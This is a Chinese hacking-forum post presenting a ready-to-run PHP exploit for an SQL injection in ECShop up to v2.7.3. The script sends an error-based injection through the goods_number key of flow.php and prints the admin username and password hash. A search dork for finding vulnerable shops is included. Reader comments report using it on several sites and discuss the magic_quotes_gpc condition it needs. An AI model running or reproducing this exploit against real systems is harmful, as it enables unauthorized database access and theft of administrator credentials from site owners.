ECShop <= v2.7.3 SQL injection / exploit
好像是最新的
<?php
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.7.3 SQL injection / exploit
by 帅的一塌糊涂
mail: hiqiushuiabc gmail dot com
team: [url]http://hi.baidu.com/w5r2[/url]
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$str = send();
if ( $str){
preg_match('/ouou~(.*?)~1/', $str, $arr);
$result=explode("-",$arr[1]);
if($result[0]=="")
{
print_r("Exploit Failed! \n");
}
else
{
print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");
}
}
function send()
{
global $host, $path;
$cmd ='step=update_cart&goods_number[-111%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,user_name,0x2D,password,0x7E31)%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#]=2';
$data = "POST ".$path."flow.php HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: Close\r\n\r\n";
$data .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
echo $resp;
}
?>
评论20次
成功了好几个,顶一下~~~~~~~~~~
还是成功好几个的
要看人品爆发才能利用。、
off 我试过了可以使用,这个跟配置还是有关xi
我是被首页图片xi引进来的
为什么你们总是赖不住空虚尼。。。。。。 还没怎么玩这洞子 就被公开了。。。
靠!,,,,,,,,,原来黑客除了日站,还有副业,开黄网!!!!!!
你那个blog真是害人啊。。 貌似tools就你最活跃,xi望多看到新作品啊
老漏洞了 只是官方没补,几个月前 自己也发现了 网上一查 发现早在2010年大牛们就发现了 http://hi.baidu.com/xhmln9/item/775416085695c5163b53ee72
我没成功过
好东西,支持。
off 的时候确实可以
确实很鸡肋。
php6 取消GPC?
黑阔被误解了 0.0
确实有点鸡肋,随手试了下,没一个成功
这个漏洞确实存在,只是有点鸡肋 必须是magic_quotes_gpc = off 而最新版本的2.7.3虽然做了一些过滤,但是看到那个过滤我笑了
声明下,90sec那个hup是我。。。!!!,不想过多解释!
是上次乌云发那个吧 在gpc没开的情况下 ecshop只过滤了value 而没过滤key 所以注射产生 我以前读的时候也发现几个类似的key注射 不过没在意 因为当时我gpc是打开状态 所以各位黑客使劲挖吧